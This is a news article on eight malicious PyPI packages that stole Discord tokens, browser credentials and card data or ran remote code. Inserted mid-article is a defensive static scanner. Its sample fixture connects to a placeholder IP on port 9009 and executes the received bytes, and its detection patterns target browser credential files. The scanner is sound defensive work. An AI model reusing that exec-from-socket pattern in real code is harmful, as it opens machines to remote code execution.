Software downloaded 30,000 times from PyPI ransacked developers’ machines


Open source packages downloaded an estimated 30,000 times from the PyPI repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code into infected machines, researchers said Thursday.

Researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of security company JFrog said they recently found eight packages in PyPI that carried out a variety of malicious activities. Based on searches on a site that provides Python package download statistics, the researchers estimate that the malicious packages were downloaded about 30,000 times.

Systemic threat

The discovery is the latest in a long line of attacks in recent years that abuse the trust placed in open source repositories, which millions of software developers rely on every day. Despite their crucial role, repositories often lack robust security and vetting controls, a weakness that has the potential to cause serious supply chain attacks when developers inadvertently infect their own machines or embed malicious code in the software they publish.

“The ongoing discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks,” JFrog CTO Asaf Karas wrote in an email. “The ability of attackers to use simple stealth techniques to introduce malware means that developers must be concerned and vigilant. This is a systemic threat and must be actively addressed at multiple layers, both by maintainers of software repositories and by developers.”

The researchers thanked PyPI maintainer Dustin Ingram “for responding quickly and removing malicious packages” when notified. Ingram did not immediately respond to a request for comment.

The packages in Thursday’s batch carried out different kinds of nefarious activities. Six of them had three payloads: one to collect authentication cookies for Discord accounts, a second to extract passwords or payment card data stored by browsers, and a third to collect information about the infected PC, such as IP addresses, computer name, and username.

The remaining two packages had malware that tries to connect to an attacker-designated IP address on TCP port 9009 and then executes whatever Python code is served over the socket. It is not known what the IP address was or whether any malware was hosted on it.

Like most novice Python malware, the packages used only simple obfuscation, such as Base64 encoding. Here is a breakdown of the packages:
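Because the obfuscation is this thin, the payloads described above (a Base64 blob handed straight to exec, and a socket on TCP 9009 whose bytes are executed as Python) can be spotted by a static triage pass over a package’s source before it is ever installed. The following scanner is an added example written for this article; it is not JFrog’s tooling or code from the packages. The sample module it inspects is constructed to mimic the described behaviour, the IP address is a documentation placeholder (the real one is unknown), and the string indicators (PyArmor runtime names, Discord, Chromium credential database filenames) are assumptions based on what the payloads are said to collect.

```python
import ast
import base64
import re

# Constructed sample: what a "Frankenstein" package module might look like.
# Line 3 execs a Base64 blob, line 4 opens a socket to a placeholder host on
# TCP 9009 (the article says the real address is unknown), line 5 execs
# whatever comes back from that socket.
SAMPLE_BAD = '''
import base64, socket
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
s = socket.socket(); s.connect(("203.0.113.10", 9009))
exec(s.recv(65536))
'''

# Constructed benign module for comparison.
SAMPLE_GOOD = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

# Assumed string indicators, chosen from the behaviour described in the
# article (PyArmor obfuscation, Discord token theft, browser credential theft).
INDICATORS = {
    "pyarmor_marker": re.compile(r"__pyarmor__|pyarmor_runtime|pytransform"),
    "discord_reference": re.compile(r"discord", re.IGNORECASE),
    "browser_credential_db": re.compile(r"Login Data|Web Data|Local State"),
}

DECODERS = {"b64decode", "b32decode", "b16decode", "decompress", "unhexlify"}
NETWORK_READS = {"recv", "recv_into", "urlopen", "read"}


def _call_name(node):
    """Return the called name for exec(...) or obj.method(...), else None."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return None


def _contains_call_to(node, names):
    """True if any call under `node` targets one of `names`."""
    return any(isinstance(sub, ast.Call) and _call_name(sub) in names
               for sub in ast.walk(node))


def _decode_literal_blobs(node):
    """Decode Base64 string literals passed to b64decode under `node`."""
    out = []
    for sub in ast.walk(node):
        if (isinstance(sub, ast.Call) and _call_name(sub) == "b64decode"
                and sub.args and isinstance(sub.args[0], ast.Constant)
                and isinstance(sub.args[0].value, str)):
            try:
                out.append(base64.b64decode(sub.args[0].value).decode("utf-8", "replace"))
            except ValueError:
                pass
    return out


def triage_source(src):
    """Return (lineno, tag, detail) findings for one Python source file."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in ("exec", "eval"):
            if any(_contains_call_to(a, DECODERS) for a in node.args):
                decoded = [blob for a in node.args for blob in _decode_literal_blobs(a)]
                findings.append((node.lineno, "exec_of_decoded_blob", "; ".join(decoded)))
            elif any(_contains_call_to(a, NETWORK_READS) for a in node.args):
                findings.append((node.lineno, "exec_of_network_data", ""))
            elif not all(isinstance(a, ast.Constant) for a in node.args):
                findings.append((node.lineno, "exec_of_dynamic_code", ""))
        elif name == "connect":
            # A literal (host, port) tuple is a hard-coded command endpoint.
            for a in node.args:
                if (isinstance(a, ast.Tuple) and len(a.elts) == 2
                        and all(isinstance(e, ast.Constant) for e in a.elts)):
                    host, port = a.elts[0].value, a.elts[1].value
                    findings.append((node.lineno, "hardcoded_endpoint", f"{host}:{port}"))
    for lineno, line in enumerate(src.splitlines(), 1):
        for tag, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((lineno, tag, line.strip()))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("bad", SAMPLE_BAD), ("good", SAMPLE_GOOD)):
        print(label, triage_source(src))
```

Run it over every `.py` file in an unpacked sdist or wheel (setup.py and `__init__.py` first, since that is where install-time and import-time payloads sit). The decoded blob is printed so a reviewer sees what the Base64 actually hides; anything that execs network bytes or decoded data is worth a manual look regardless of how the rest of the package reads.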

Package name   Maintainer   Payload
noblesse       xin1111      Discord token stealer, credit card stealer (Windows-based)
genesisbot     xin1111      Same as noblesse
aryi           xin1111      Same as noblesse
suffer         suffer       Same as noblesse, obfuscated with PyArmor
noblesse2      suffer       Same as noblesse
noblessev2     suffer       Same as noblesse
pytagora       leonora123   Remote code injection
pytagora2      leonora123   Same as pytagora

Karas told me that the first six packages had the ability to infect the developer’s computer but could not taint the code those developers wrote with malware.

“For the pytagora and pytagora2 packages, which allow code to run on the machine they were installed on, this would be possible,” he said in a direct message. “After infecting the development machine, they would allow code execution and then the attacker could download a payload that would modify the software projects under development. However, we have no evidence that this was actually done.”

Beware of ‘Frankenstein’ Malware Packages

Instead of spending days developing code that performs everyday tasks, programmers can turn to repositories such as PyPI, RubyGems, or npm for mature application packages that their peers have already developed. Among the 2.7 million packages available on PyPI, for example, are ones developers can use to predict the sale price of a house using data scraped from the Internet, send email through Amazon’s Simple Email Service, or check open source code for vulnerabilities. PyPI provides packages for software written in Python, while RubyGems and npm provide packages for Ruby and JavaScript applications.

This crucial role makes repositories the ideal setting for supply chain attacks, which have become increasingly common through the use of techniques known as typosquatting or dependency confusion.

Repository supply chain attacks date back to at least 2016, when a college student uploaded malicious packages to PyPI. Over several months, his imposter code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time it was given all-powerful administrative rights. Since then, supply chain attacks have become commonplace for RubyGems and npm as well. In recent months, white hat hackers have devised a new type of supply chain attack that works by uploading malicious packages to public code repositories and giving them a name identical to a package stored in a company’s internal repository. These so-called dependency confusion attacks have already caught Apple, Microsoft, and 33 other companies.

The JFrog researchers said that, given the current state of repository security, more such attacks are likely in the future.

“Almost all of the code snippets analyzed in this investigation were based on known public tools, with only a few parameters changed,” they wrote. “Obfuscation was also based on public obfuscators. We expect to see more of these ‘Frankenstein’ malware packages combined from different attack tools (with modified exfiltration parameters).”
